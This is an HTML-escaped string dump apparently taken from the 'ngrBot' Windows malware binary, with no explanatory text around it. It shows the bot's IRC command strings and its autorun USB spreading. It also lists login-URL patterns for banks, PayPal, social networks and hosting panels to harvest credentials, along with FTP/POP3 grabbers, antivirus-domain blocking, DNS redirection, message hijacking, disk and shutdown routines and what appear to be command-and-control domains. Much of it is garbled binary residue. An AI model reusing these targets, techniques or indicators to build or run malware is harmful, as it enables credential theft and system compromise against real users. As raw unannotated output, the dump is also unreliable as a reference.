/&gt;Rhh+A&lt;br /&gt;QhX+A&lt;br /&gt;@PVR&lt;br /&gt;Wj j+V&lt;br /&gt;&amp;lt;%u2&lt;br /&gt;VVVV&lt;br /&gt;SVWh&lt;br /&gt;QRPu&lt;br /&gt;PQRu&lt;br /&gt;h ,A&lt;br /&gt;QRhL]A&lt;br /&gt;PhT\A&lt;br /&gt;Ph$]A&lt;br /&gt;9Q@w&lt;br /&gt;RRhh&lt;br /&gt;h`]A&lt;br /&gt;h`]A&lt;br /&gt;h`]A&lt;br /&gt;h`]A&lt;br /&gt;Ph0]A&lt;br /&gt;8nu8h&lt;br /&gt;Rh0]A&lt;br /&gt;Qh0]A&lt;br /&gt;Rh0]A&lt;br /&gt;Ph@]A&lt;br /&gt;8nu8h&lt;br /&gt;Rh@]A&lt;br /&gt;Qh@]A&lt;br /&gt;Rh@]A&lt;br /&gt;htXA&lt;br /&gt;h@XA&lt;br /&gt;PVRQhT`A&lt;br /&gt;PQRVh&lt;br /&gt;RQPhT`A&lt;br /&gt;PQRSh&lt;br /&gt;8_^[&lt;br /&gt;hPXA&lt;br /&gt;h\XA&lt;br /&gt;hHXA&lt;br /&gt;Rh0]A&lt;br /&gt;Rh0]A&lt;br /&gt;Rh@]A&lt;br /&gt;Qh@]A&lt;br /&gt;h&amp;#124;,A&lt;br /&gt;h&amp;#124;,A&lt;br /&gt;hx,A&lt;br /&gt;QhP_A&lt;br /&gt;Qh&amp;#124;_A&lt;br /&gt;hx,A&lt;br /&gt;h(XA&lt;br /&gt;hp,A&lt;br /&gt;hd,A&lt;br /&gt;h8XA&lt;br /&gt;8httpuM&lt;br /&gt;8:uE&lt;br /&gt;u&amp;gt;8P&lt;br /&gt;PhD,A&lt;br /&gt;$_^[&lt;br /&gt;Qh@`A&lt;br /&gt; _^[&lt;br /&gt;h@,A&lt;br /&gt;h(`A&lt;br /&gt;h&amp;#124;bA&lt;br /&gt;QRPh4,A&lt;br /&gt;h`XA&lt;br /&gt;h4XA&lt;br /&gt;hXXA&lt;br /&gt;hpXA&lt;br /&gt;QRPh4,A&lt;br /&gt;hhXA&lt;br /&gt;RPQh4,A&lt;br /&gt;SVWh&lt;br /&gt;8#t&amp;quot;&lt;br /&gt;RVWP&lt;br /&gt;SVWR&lt;br /&gt;hx,A&lt;br /&gt;hx,A&lt;br /&gt;hx]A&lt;br /&gt;Qhl]A&lt;br /&gt;PQh0]A&lt;br /&gt;u(hl&lt;br /&gt;Ph$]A&lt;br /&gt;QRh0]A&lt;br /&gt;SVW3&lt;br /&gt;h -A&lt;br /&gt;t&amp;quot;h&amp;lt;-A&lt;br /&gt;t&amp;quot;h0-A&lt;br /&gt;u5h(-A&lt;br /&gt;Vh$cA&lt;br /&gt;VhDcA&lt;br /&gt;VhdcA&lt;br /&gt;VhpcA&lt;br /&gt;t)h0u&lt;br /&gt;SVW3&lt;br /&gt;RPhD-A&lt;br /&gt;QRPh&lt;br /&gt;QRPh&lt;br /&gt;PQRhTaA&lt;br /&gt;PQhDbA&lt;br /&gt;PRh(aA&lt;br /&gt;QRPh&lt;br /&gt;SVW3&lt;br /&gt;tRh&amp;#124;,A&lt;br /&gt;uBPh&lt;br /&gt;h`]A&lt;br /&gt;h -A&lt;br /&gt;PWQRh&lt;br /&gt;SPQh&lt;br /&gt;PSRhTaA&lt;br /&gt;PhTaA&lt;br /&gt;PRhDbA&lt;br /&gt;Ph(aA&lt;br /&gt;hx,A&lt;br /&gt;tqCh&lt;br /&gt;s[h5&lt;br /&gt;ht.A&lt;br /&gt;SWhl.A&lt;br /&gt;hd.A&lt;br /&gt;t'j j&lt;br /&gt;h&amp;lt;.A&lt;br /&gt;h46A&lt;br /&gt;SVWh&lt;br /&gt;hx,A&lt;br /&gt;Rh$6A&lt;br /&gt;h\/A&lt;br /&gt;h\/A&lt;br /&gt;tb@Ph&lt;br /&gt;Rhd/A&lt;br /&gt;;&amp;lt; t&lt;br /&gt;SVW3&lt;br /&gt;Wh00A&lt;br /&gt;h 0A&lt;br /&gt;5$iA&lt;br /&gt;50iA&lt;br /&gt;5&amp;lt;iA&lt;br /&gt;5HiA&lt;br /&gt;5TiA&lt;br /&gt;5`iA&lt;br /&gt;5liA&lt;br /&gt;95$iA&lt;br /&gt;6 iA&lt;br /&gt;taVW&lt;br /&gt;h@0A&lt;br /&gt;hD0A&lt;br /&gt;Ph&amp;lt;_A&lt;br /&gt;&amp;#124;Sj 3&lt;br /&gt;tlSSSSSSSSSShL0A&lt;br /&gt;Phd0A&lt;br /&gt;tU&amp;lt; u&lt;br /&gt;u2Wh&lt;br /&gt;h(3A&lt;br /&gt;hT+A&lt;br /&gt;hT+A&lt;br /&gt;SVWh&lt;br /&gt;hT+A&lt;br /&gt;h,3A&lt;br /&gt;u.h,3A&lt;br /&gt;SVWh&lt;br /&gt;RhP3A&lt;br /&gt;PVQR&lt;br /&gt;h@3A&lt;br /&gt;;SDG &lt;br /&gt;8SDG &lt;br /&gt;h,3A&lt;br /&gt;Qhx3A&lt;br /&gt;RPhl3A&lt;br /&gt;QRhT3A&lt;br /&gt;t!WV&lt;br /&gt;_^[]&lt;br /&gt;hl.A&lt;br /&gt;hd.A&lt;br /&gt;hl.A&lt;br /&gt;hd.A&lt;br /&gt;h(mA&lt;br /&gt;h(5A&lt;br /&gt;t!h85A&lt;br /&gt;_^t)&lt;br /&gt;9&amp;#124;:~&lt;br /&gt;:~+w:~&lt;br /&gt;tK@boL@&lt;br /&gt;L@iBK@&lt;br /&gt;%s.%s&lt;br /&gt;pdef&lt;br /&gt;%s.%S&lt;br /&gt;%s.Blocked &amp;quot;%s&amp;quot; from removing our bot file!&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from removing our bot file!&lt;br /&gt;block&lt;br /&gt;bdns&lt;br /&gt;CreateFileW&lt;br /&gt;0123456789ABCDEF&lt;br /&gt;i.root-servers.org&lt;br /&gt;%s.Blocked &amp;quot;%s&amp;quot; from moving our bot file&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from moving our bot file&lt;br /&gt;%s.p10-&amp;gt; Message hijacked!&lt;br /&gt;%s.p10-&amp;gt; Message to %s hijacked!&lt;br /&gt;%s.p21-&amp;gt; Message hijacked!&lt;br /&gt;msnmsg&lt;br /&gt;msnint&lt;br /&gt;baddr&lt;br /&gt;X-MMS-IM-Format:&lt;br /&gt;CAL %d %256s&lt;br /&gt;msnu&lt;br /&gt;Done frst&lt;br /&gt;ngr-&amp;gt;blocksize: %d&lt;br /&gt;block_size: %d&lt;br /&gt;NtFreeVirtualMemory&lt;br /&gt;NtAllocateVirtualMemory&lt;br /&gt;NtQuerySystemInformation&lt;br /&gt;LdrEnumerateLoadedModules&lt;br /&gt;NtQueryInformationProcess&lt;br /&gt;LdrGetProcedureAddress&lt;br /&gt;NtQueryVirtualMemory&lt;br /&gt;LdrLoadDll&lt;br /&gt;NtQueryInformationThread&lt;br /&gt;LdrGetDllHandle&lt;br /&gt;RtlAnsiStringToUnicodeString&lt;br /&gt;\\.\pipe\%s&lt;br /&gt;kernel32.dll&lt;br /&gt;GetNativeSystemInfo&lt;br /&gt;%s_%d&lt;br /&gt;%s_0&lt;br /&gt;%s-Mutex&lt;br /&gt;SeDebugPrivilege&lt;br /&gt;ntdll.dll&lt;br /&gt;NtGetNextProcess&lt;br /&gt;%s-pid&lt;br /&gt;%s-comm&lt;br /&gt;NtResumeThread&lt;br /&gt;PONG &lt;br /&gt;JOIN #&lt;br /&gt;PRIVMSG #&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from creating &amp;quot;%S&amp;quot;&lt;br /&gt;%s.Blocked &amp;quot;%S&amp;quot; from creating &amp;quot;%S&amp;quot; - &amp;quot;%s&amp;quot; will be removed at reboot!&lt;br /&gt;.exe&lt;br /&gt;%s.Detected process &amp;quot;%S&amp;quot; sending an IRC packet to server %s:%d.&lt;br /&gt;%s.Detected process &amp;quot;%S&amp;quot; sending an IRC packet to server %s:%d (Target: %s).&lt;br /&gt;PRIVMSG %255s&lt;br /&gt;JOIN %255s&lt;br /&gt;PRIVMSG&lt;br /&gt;JOIN&lt;br /&gt;%s:%d&lt;br /&gt;NtSetInformationProcess&lt;br /&gt;%s.%s%s&lt;br /&gt;%S%s%s&lt;br /&gt;HKCU\&lt;br /&gt;HKLM\&lt;br /&gt;%s.%S%S&lt;br /&gt;%S%S%S&lt;br /&gt;state_%s&lt;br /&gt;%s.%s (p='%S')&lt;br /&gt;pop3://%s:%s@%s:%d&lt;br /&gt;popgrab&lt;br /&gt;%s:%s@%s:%d&lt;br /&gt;anonymous&lt;br /&gt;ftp://%s:%s@%s:%d&lt;br /&gt;ftpgrab&lt;br /&gt;%s.%s -&amp;gt;&amp;gt; %s (%s : %s)&lt;br /&gt;%s.%s -&amp;gt;&amp;gt; %s : %s&lt;br /&gt;Directadmin&lt;br /&gt;WHCMS&lt;br /&gt;cPanel&lt;br /&gt;blog&lt;br /&gt;%s-%s-%s&lt;br /&gt;ffgrab&lt;br /&gt;iegrab&lt;br /&gt;%s.Blocked possible browser exploit pack call on URL '%s'&lt;br /&gt;%s.Blocked possible browser exploit pack call on URL '%S'&lt;br /&gt;webroot.&lt;br /&gt;fortinet.&lt;br /&gt;virusbuster.nprotect.&lt;br /&gt;gdatasoftware.&lt;br /&gt;virus.&lt;br /&gt;precisesecurity.&lt;br /&gt;lavasoft.&lt;br /&gt;heck.tc&lt;br /&gt;emsisoft.&lt;br /&gt;onlinemalwarescanner.&lt;br /&gt;onecare.live.&lt;br /&gt;f-secure.&lt;br /&gt;bullguard.&lt;br /&gt;clamav.&lt;br /&gt;pandasecurity.&lt;br /&gt;sophos.&lt;br /&gt;malwarebytes.&lt;br /&gt;sunbeltsoftware.&lt;br /&gt;norton.&lt;br /&gt;norman.&lt;br /&gt;mcafee.&lt;br /&gt;symantec&lt;br /&gt;comodo.&lt;br /&gt;avast.&lt;br /&gt;avira.&lt;br /&gt;avg.&lt;br /&gt;bitdefender.&lt;br /&gt;eset.&lt;br /&gt;kaspersky.&lt;br /&gt;trendmicro.&lt;br /&gt;iseclab.&lt;br /&gt;virscan.&lt;br /&gt;garyshood.&lt;br /&gt;viruschief.&lt;br /&gt;jotti.&lt;br /&gt;threatexpert.&lt;br /&gt;novirusthanks.&lt;br /&gt;virustotal.&lt;br /&gt;login[password]&lt;br /&gt;login[username]&lt;br /&gt;*members*.iknowthatgirl*/members*&lt;br /&gt;IKnowThatGirl&lt;br /&gt;*youporn.*/login*&lt;br /&gt;YouPorn&lt;br /&gt;*members.brazzers.com*&lt;br /&gt;Brazzers&lt;br /&gt;clave&lt;br /&gt;numeroTarjeta&lt;br /&gt;*clave=*&lt;br /&gt;*bcointernacional*login*&lt;br /&gt;Bcointernacional&lt;br /&gt;*:2222/CMD_LOGIN*&lt;br /&gt;*whcms*dologin*&lt;br /&gt;*:2086/login*&lt;br /&gt;*:2083/login*&lt;br /&gt;*:2082/login*&lt;br /&gt;*webnames.ru/*user_login*&lt;br /&gt;Webnames&lt;br /&gt;*dotster.com/*login*&lt;br /&gt;Dotster&lt;br /&gt;loginid&lt;br /&gt;*enom.com/login*&lt;br /&gt;Enom&lt;br /&gt;login.Pass&lt;br /&gt;login.User&lt;br /&gt;*login.Pass=*&lt;br /&gt;*1and1.com/xml/config*&lt;br /&gt;1and1&lt;br /&gt;token&lt;br /&gt;*moniker.com/*Login*&lt;br /&gt;Moniker&lt;br /&gt;LoginPassword&lt;br /&gt;LoginUserName&lt;br /&gt;*LoginPassword=*&lt;br /&gt;*namecheap.com/*login*&lt;br /&gt;Namecheap&lt;br /&gt;loginname&lt;br /&gt;*godaddy.com/login*&lt;br /&gt;Godaddy&lt;br /&gt;Password&lt;br /&gt;EmailName&lt;br /&gt;*Password=*&lt;br /&gt;*alertpay.com/login*&lt;br /&gt;Alertpay&lt;br /&gt;*netflix.com/*ogin*&lt;br /&gt;Netflix&lt;br /&gt;*thepiratebay.org/login*&lt;br /&gt;Thepiratebay&lt;br /&gt;*torrentleech.org/*login*&lt;br /&gt;Torrentleech&lt;br /&gt;*vip-file.com/*/signin-do*&lt;br /&gt;Vip-file&lt;br /&gt;*pas=*&lt;br /&gt;*sms4file.com/*/signin-do*&lt;br /&gt;Sms4file&lt;br /&gt;*letitbit.net*&lt;br /&gt;Letitbit&lt;br /&gt;*what.cd/login*&lt;br /&gt;Whatcd&lt;br /&gt;*oron.com/login*&lt;br /&gt;Oron&lt;br /&gt;*filesonic.com/*login*&lt;br /&gt;Filesonic&lt;br /&gt;*speedyshare.com/login*&lt;br /&gt;Speedyshare&lt;br /&gt;*pw=*&lt;br /&gt;*uploaded.to/*login*&lt;br /&gt;Uploaded&lt;br /&gt;*uploading.com/*login*&lt;br /&gt;Uploading&lt;br /&gt;loginUserPassword&lt;br /&gt;loginUserName&lt;br /&gt;*loginUserPassword=*&lt;br /&gt;*fileserv.com/login*&lt;br /&gt;Fileserve&lt;br /&gt;*hotfile.com/login*&lt;br /&gt;Hotfile&lt;br /&gt;*4shared.com/login*&lt;br /&gt;4shared&lt;br /&gt;txtpass&lt;br /&gt;txtuser&lt;br /&gt;*txtpass=*&lt;br /&gt;*netload.in/index*&lt;br /&gt;Netload&lt;br /&gt;*freakshare.com/login*&lt;br /&gt;Freakshare&lt;br /&gt;login_pass&lt;br /&gt;*login_pass=*&lt;br /&gt;*mediafire.com/*login*&lt;br /&gt;Mediafire&lt;br /&gt;*sendspace.com/login*&lt;br /&gt;Sendspace&lt;br /&gt;*megaupload.*/*login*&lt;br /&gt;Megaupload&lt;br /&gt;*depositfiles.*/*/login*&lt;br /&gt;Depositfiles&lt;br /&gt;userid&lt;br /&gt;*signin.ebay*SignIn&lt;br /&gt;eBay&lt;br /&gt;*officebanking.cl/*login.asp*&lt;br /&gt;OfficeBanking&lt;br /&gt;*secure.logmein.*/*logincheck*&lt;br /&gt;LogMeIn&lt;br /&gt;session[password]&lt;br /&gt;session[username_or_email]&lt;br /&gt;*password]=*&lt;br /&gt;*twitter.com/sessions&lt;br /&gt;Twitter&lt;br /&gt;txtPassword&lt;br /&gt;txtEmail&lt;br /&gt;*&amp;amp;txtPassword=*&lt;br /&gt;*.moneybookers.*/*login.pl&lt;br /&gt;Moneybookers&lt;br /&gt;*runescape*/*weblogin*&lt;br /&gt;Runescape&lt;br /&gt;*dyndns*/account*&lt;br /&gt;DynDNS&lt;br /&gt;*&amp;amp;password=*&lt;br /&gt;*no-ip*/login*&lt;br /&gt;NoIP&lt;br /&gt;*steampowered*/login*&lt;br /&gt;Steam&lt;br /&gt;quick_password&lt;br /&gt;quick_username&lt;br /&gt;username&lt;br /&gt;*hackforums.*/member.php&lt;br /&gt;Hackforums&lt;br /&gt;email&lt;br /&gt;*facebook.*/login.php*&lt;br /&gt;Facebook&lt;br /&gt;*login.yahoo.*/*login*&lt;br /&gt;Yahoo&lt;br /&gt;passwd&lt;br /&gt;login&lt;br /&gt;*passwd=*&lt;br /&gt;*login.live.*/*post.srf*&lt;br /&gt;Live&lt;br /&gt;TextfieldPassword&lt;br /&gt;TextfieldEmail&lt;br /&gt;*TextfieldPassword=*&lt;br /&gt;*gmx.*/*FormLogin*&lt;br /&gt;*Passwd=*&lt;br /&gt;Gmail&lt;br /&gt;FLN-Password&lt;br /&gt;FLN-UserName&lt;br /&gt;*FLN-Password=*&lt;br /&gt;*fastmail.*/mail/*&lt;br /&gt;Fastmail&lt;br /&gt;pass&lt;br /&gt;user&lt;br /&gt;*pass=*&lt;br /&gt;*bigstring.*/*index.php*&lt;br /&gt;BigString&lt;br /&gt;screenname&lt;br /&gt;*screenname.aol.*/login.psp*&lt;br /&gt;password&lt;br /&gt;loginId&lt;br /&gt;*password=*&lt;br /&gt;*aol.*/*login.psp*&lt;br /&gt;Passwd&lt;br /&gt;Email&lt;br /&gt;*service=youtube*&lt;br /&gt;*google.*/*ServiceLoginAuth*&lt;br /&gt;YouTube&lt;br /&gt;login_password&lt;br /&gt;login_email&lt;br /&gt;*login_password=*&lt;br /&gt;*paypal.*/webscr?cmd=_login-submit*&lt;br /&gt;PayPal&lt;br /&gt;%s / ?%d HTTP/1.1&lt;br /&gt;Host: %s&lt;br /&gt;User-Agent: %s&lt;br /&gt;Keep-Alive: 300&lt;br /&gt;Connection: keep-alive&lt;br /&gt;Content-Length: 42&lt;br /&gt;POST&lt;br /&gt;Mozilla/4.0&lt;br /&gt;Connection: Close&lt;br /&gt;X-a: b&lt;br /&gt;\\.\PHYSICALDRIVE0&lt;br /&gt;00100&lt;br /&gt;SeShutdownPrivilege&lt;br /&gt;NtShutdownSystem&lt;br /&gt;This binary is invalid.&lt;br /&gt;Main reasons:&lt;br /&gt;- you stupid cracker&lt;br /&gt;- you stupid cracker...&lt;br /&gt;- you stupid cracker?!&lt;br /&gt;ngrBot Error&lt;br /&gt;shell32.dll&lt;br /&gt;http&lt;br /&gt;httpi&lt;br /&gt;usbi&lt;br /&gt;dnsapi.dll&lt;br /&gt;DnsFlushResolverCache&lt;br /&gt;http://%s/%s&lt;br /&gt;http://%s/&lt;br /&gt;HTTP&lt;br /&gt;Host: &lt;br /&gt;POST /%1023s&lt;br /&gt;{%s&amp;#124;%s%s}%s&lt;br /&gt;n%s{%s&amp;#124;%s%s}%s&lt;br /&gt;&amp;lt;br&amp;gt;&lt;br /&gt;admin&lt;br /&gt;isadmin&lt;br /&gt;%s&amp;#124;%s&amp;#124;%s&lt;br /&gt;[DNS]: Redirecting &amp;quot;%s&amp;quot; to &amp;quot;%s&amp;quot;&lt;br /&gt;disabled&lt;br /&gt;enabled&lt;br /&gt;%s&amp;#124;%s&lt;br /&gt;[Logins]: Cleared %d logins&lt;br /&gt;#user&lt;br /&gt;#admin&lt;br /&gt;#new&lt;br /&gt;removing&lt;br /&gt;exiting&lt;br /&gt;reconnecting&lt;br /&gt;MOTD&lt;br /&gt;bsod&lt;br /&gt;disable&lt;br /&gt;POP3 -&amp;gt; &lt;br /&gt;FTP -&amp;gt; &lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Download error: MD5 mismatch (%s != %s)&lt;br /&gt;dlds&lt;br /&gt;http://&lt;br /&gt;rebooting&lt;br /&gt;[Login]: %s&lt;br /&gt;[DNS]: Blocked %d domain(s) - Redirected %d domain(s)&lt;br /&gt;[Speed]: Estimated upload speed %d KB/s&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;ngrBot&lt;br /&gt;running&lt;br /&gt;IPC_Check&lt;br /&gt;shell\open\command=&lt;br /&gt;shell\explore\command=&lt;br /&gt;icon=shell32.dll,7&lt;br /&gt;useautoplay=1&lt;br /&gt;action=Open folder to view files&lt;br /&gt;shellexecute=&lt;br /&gt;[autorun]&lt;br /&gt;.lnk&lt;br /&gt;%windir%\system32\cmd.exe&lt;br /&gt;&amp;amp;&amp;amp;%%windir%%\explorer.exe %%cd%%%s&lt;br /&gt;/c &amp;quot;start %%cd%%RECYCLER\%s&lt;br /&gt;RECYCLER&lt;br /&gt;.inf&lt;br /&gt;%s%s&lt;br /&gt;\\.\%c:&lt;br /&gt;%s\%s&lt;br /&gt;%sautorun.tmp&lt;br /&gt;%sautorun.inf&lt;br /&gt;%c:\&lt;br /&gt;gdkWindowToplevelClass&lt;br /&gt;%0x.exe&lt;br /&gt;comment-text&lt;br /&gt;*bebo.*/c/home/ajax_post_lifestream_comment&lt;br /&gt;bebo Lifestream&lt;br /&gt;*bebo.*/c/profile/comment_post.json&lt;br /&gt;bebo Comment&lt;br /&gt;Message&lt;br /&gt;*bebo.*/mail/MailCompose.jsp*&lt;br /&gt;bebo Message&lt;br /&gt;*friendster.*/sendmessage.php*&lt;br /&gt;Friendster Message&lt;br /&gt;comment&lt;br /&gt;Friendster Comment&lt;br /&gt;shoutout&lt;br /&gt;*friendster.*/rpc.php&lt;br /&gt;Friendster Shoutout&lt;br /&gt;*vkontakte.ru/mail.php&lt;br /&gt;vkontakte Message&lt;br /&gt;*vkontakte.ru/wall.php&lt;br /&gt;vkontakte Wall&lt;br /&gt;message&lt;br /&gt;*vkontakte.ru/api.php&lt;br /&gt;vkontakte Chat&lt;br /&gt;text&lt;br /&gt;*twitter.*/*direct_messages/new*&lt;br /&gt;Twitter Message&lt;br /&gt;*twitter.*/*status*/update*&lt;br /&gt;Twitter Tweet&lt;br /&gt;status&lt;br /&gt;*facebook.*/ajax/*MessageComposerEndpoint.php*&lt;br /&gt;Facebook Message&lt;br /&gt;msg_text&lt;br /&gt;*facebook.*/ajax/chat/send.php*&lt;br /&gt;Facebook IM&lt;br /&gt;-_.!~*'()&lt;br /&gt;Content-Length: &lt;br /&gt;%s.%s hijacked!&lt;br /&gt;MSG %d %s %d&lt;br /&gt;MSG %d %1s&lt;br /&gt;SDG %d %d&lt;br /&gt;Reliability: &lt;br /&gt;From: &lt;br /&gt;Content-Length: %d&lt;br /&gt;X-MMS-IM-Format: &lt;br /&gt;SDG %d&lt;br /&gt;bmsn&lt;br /&gt;%s_0x%08X&lt;br /&gt;RegCreateKeyExW&lt;br /&gt;RegCreateKeyExA&lt;br /&gt;URLDownloadToFileW&lt;br /&gt;URLDownloadToFileA&lt;br /&gt;PR_Write&lt;br /&gt;DnsQuery_W&lt;br /&gt;DnsQuery_A&lt;br /&gt;InternetWriteFile&lt;br /&gt;HttpSendRequestW&lt;br /&gt;HttpSendRequestA&lt;br /&gt;GetAddrInfoW&lt;br /&gt;send&lt;br /&gt;CreateFileA&lt;br /&gt;MoveFileW&lt;br /&gt;MoveFileA&lt;br /&gt;DeleteFileW&lt;br /&gt;DeleteFileA&lt;br /&gt;CopyFileW&lt;br /&gt;CopyFileA&lt;br /&gt;NtQueryDirectoryFile&lt;br /&gt;NtEnumerateValueKey&lt;br /&gt;%08x&lt;br /&gt;OPEN&lt;br /&gt;DnsFree&lt;br /&gt;DnsQuery_A&lt;br /&gt;DNSAPI.dll&lt;br /&gt;FreeContextBuffer&lt;br /&gt;InitializeSecurityContextW&lt;br /&gt;FreeCredentialsHandle&lt;br /&gt;DeleteSecurityContext&lt;br /&gt;QueryContextAttributesW&lt;br /&gt;AcquireCredentialsHandleW&lt;br /&gt;EncryptMessage&lt;br /&gt;DecryptMessage&lt;br /&gt;InitializeSecurityContextA&lt;br /&gt;ApplyControlToken&lt;br /&gt;Secur32.dll&lt;br /&gt;SHGetSpecialFolderPathW&lt;br /&gt;SHGetFileInfoA&lt;br /&gt;ShellExecuteA&lt;br /&gt;SHELL32.dll&lt;br /&gt;InternetCloseHandle&lt;br /&gt;InternetReadFile&lt;br /&gt;InternetQueryDataAvailable&lt;br /&gt;HttpQueryInfoA&lt;br /&gt;InternetOpenUrlA&lt;br /&gt;InternetOpenA&lt;br /&gt;HttpQueryInfoW&lt;br /&gt;InternetQueryOptionW&lt;br /&gt;WININET&lt;br /&gt;.dll&lt;br /&gt;PathAppendW&lt;br /&gt;StrStrIA&lt;br /&gt;PathAppendA&lt;br /&gt;PathFindExtensionA&lt;br /&gt;SHLWAPI.dll&lt;br /&gt;WS2_32.dll&lt;br /&gt;memset&lt;br /&gt;wcsstr&lt;br /&gt;strstr&lt;br /&gt;wcsrchr&lt;br /&gt;??3@YAXPAX@Z&lt;br /&gt;atoi&lt;br /&gt;sscanf&lt;br /&gt;_strcmpi&lt;br /&gt;printf&lt;br /&gt;_snprintf&lt;br /&gt;sprintf&lt;br /&gt;strncpy&lt;br /&gt;_memicmp&lt;br /&gt;_wcsnicmp&lt;br /&gt;_vsnprintf&lt;br /&gt;_stricmp&lt;br /&gt;strtok&lt;br /&gt;strchr&lt;br /&gt;_snwprintf&lt;br /&gt;??2@YAPAXI@Z&lt;br /&gt;_strnicmp&lt;br /&gt;isxdigit&lt;br /&gt;memmove&lt;br /&gt;strncmp&lt;br /&gt;toupper&lt;br /&gt;strrchr&lt;br /&gt;vsprintf&lt;br /&gt;isalnum&lt;br /&gt;strncat&lt;br /&gt;MSVCRT.dll&lt;br /&gt;lstrcpyA&lt;br /&gt;MoveFileExA&lt;br /&gt;lstrcmpA&lt;br /&gt;WideCharToMultiByte&lt;br /&gt;MoveFileExW&lt;br /&gt;lstrcmpW&lt;br /&gt;ExitThread&lt;br /&gt;MultiByteToWideChar&lt;br /&gt;GetFileAttributesA&lt;br /&gt;SetFileAttributesW&lt;br /&gt;GetFileAttributesW&lt;br /&gt;LoadLibraryW&lt;br /&gt;CloseHandle&lt;br /&gt;SetFileTime&lt;br /&gt;CreateFileW&lt;br /&gt;GetFileTime&lt;br /&gt;GetSystemTimeAsFileTime&lt;br /&gt;WriteFile&lt;br /&gt;GetModuleHandleW&lt;br /&gt;GetLastError&lt;br /&gt;ReadFile&lt;br /&gt;GetTickCount&lt;br /&gt;HeapAlloc&lt;br /&gt;GetProcessHeap&lt;br /&gt;HeapFree&lt;br /&gt;lstrlenA&lt;br /&gt;Sleep&lt;br /&gt;WriteProcessMemory&lt;br /&gt;ReadProcessMemory&lt;br /&gt;InitializeCriticalSection&lt;br /&gt;LeaveCriticalSection&lt;br /&gt;EnterCriticalSection&lt;br /&gt;HeapReAlloc&lt;br /&gt;SetEvent&lt;br /&gt;ConnectNamedPipe&lt;br /&gt;CreateNamedPipeA&lt;br /&gt;CreateEventA&lt;br /&gt;DisconnectNamedPipe&lt;br /&gt;GetOverlappedResult&lt;br /&gt;WaitForMultipleObjects&lt;br /&gt;CreateFileA&lt;br /&gt;VirtualFreeEx&lt;br /&gt;VirtualAllocEx&lt;br /&gt;IsWow64Process&lt;br /&gt;CreateRemoteThread&lt;br /&gt;OpenProcess&lt;br /&gt;WaitForSingleObject&lt;br /&gt;ReleaseMutex&lt;br /&gt;MapViewOfFile&lt;br /&gt;OpenFileMappingA&lt;br /&gt;CreateFileMappingA&lt;br /&gt;InterlockedIncrement&lt;br /&gt;UnmapViewOfFile&lt;br /&gt;CreateMutexA&lt;br /&gt;GetVersionExA&lt;br /&gt;GetModuleFileNameW&lt;br /&gt;InterlockedCompareExchange&lt;br /&gt;CreateThread&lt;br /&gt;GetWindowsDirectoryW&lt;br /&gt;DeleteFileW&lt;br /&gt;GetTempFileNameW&lt;br /&gt;lstrcatW&lt;br /&gt;lstrcpynW&lt;br /&gt;DeleteFileA&lt;br /&gt;SetFileAttributesA&lt;br /&gt;lstrcpyW&lt;br /&gt;LocalFree&lt;br /&gt;LocalAlloc&lt;br /&gt;lstrcpynA&lt;br /&gt;SetFilePointer&lt;br /&gt;DeviceIoControl&lt;br /&gt;VirtualAlloc&lt;br /&gt;CreateProcessW&lt;br /&gt;ExitProcess&lt;br /&gt;lstrcatA&lt;br /&gt;GetVolumeInformationW&lt;br /&gt;GetLocaleInfoA&lt;br /&gt;FlushFileBuffers&lt;br /&gt;CopyFileW&lt;br /&gt;FindClose&lt;br /&gt;FindNextFileA&lt;br /&gt;FindFirstFileA&lt;br /&gt;SetCurrentDirectoryA&lt;br /&gt;LockFile&lt;br /&gt;GetFileSize&lt;br /&gt;CreateDirectoryA&lt;br /&gt;GetLogicalDriveStringsA&lt;br /&gt;OpenMutexA&lt;br /&gt;GetModuleFileNameA&lt;br /&gt;GetWindowsDirectoryA&lt;br /&gt;KERNEL32.dll&lt;br /&gt;MessageBoxA&lt;br /&gt;wvsprintfA&lt;br /&gt;wsprintfW&lt;br /&gt;DefWindowProcA&lt;br /&gt;DispatchMessageA&lt;br /&gt;TranslateMessage&lt;br /&gt;GetMessageA&lt;br /&gt;RegisterDeviceNotificationA&lt;br /&gt;CreateWindowExA&lt;br /&gt;RegisterClassExA&lt;br /&gt;USER32.dll&lt;br /&gt;CryptGetHashParam&lt;br /&gt;CryptDestroyHash&lt;br /&gt;CryptHashData&lt;br /&gt;CryptReleaseContext&lt;br /&gt;CryptCreateHash&lt;br /&gt;CryptAcquireContextA&lt;br /&gt;AdjustTokenPrivileges&lt;br /&gt;LookupPrivilegeValueA&lt;br /&gt;OpenProcessToken&lt;br /&gt;RegCloseKey&lt;br /&gt;RegSetValueExW&lt;br /&gt;RegCreateKeyExW&lt;br /&gt;RegNotifyChangeKeyValue&lt;br /&gt;RegSetValueExA&lt;br /&gt;RegOpenKeyExA&lt;br /&gt;ADVAPI32.dll&lt;br /&gt;CoCreateInstance&lt;br /&gt;CoInitialize&lt;br /&gt;ole32.dll&lt;br /&gt; n;^&lt;br /&gt;Qkkbal&lt;br /&gt;i]Wb&lt;br /&gt;9a&amp;amp;g&lt;br /&gt;MGiI&lt;br /&gt;wn&amp;gt;Jj&lt;br /&gt;#.zf&lt;br /&gt;+o*7&lt;br /&gt;!!!!!!!!&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@&lt;br /&gt;@@@@@@@@@&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;@@@@@@&lt;br /&gt;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x&lt;br /&gt;lalorlz1.info&lt;br /&gt;ROCKR&lt;br /&gt;rlz1lola.info&lt;br /&gt;ROCKR&lt;br /&gt;rlz01jm.info&lt;br /&gt;ROCKR&lt;br /&gt;#ROCK&lt;br /&gt;ngrBot&lt;br /&gt;ELPERRO&lt;br /&gt;]1.1.0.0&lt;br /&gt;CUSTOMER&lt;br /&gt;FvLQ49IlzIyLjj6m&lt;br /&gt;msn.set&lt;br 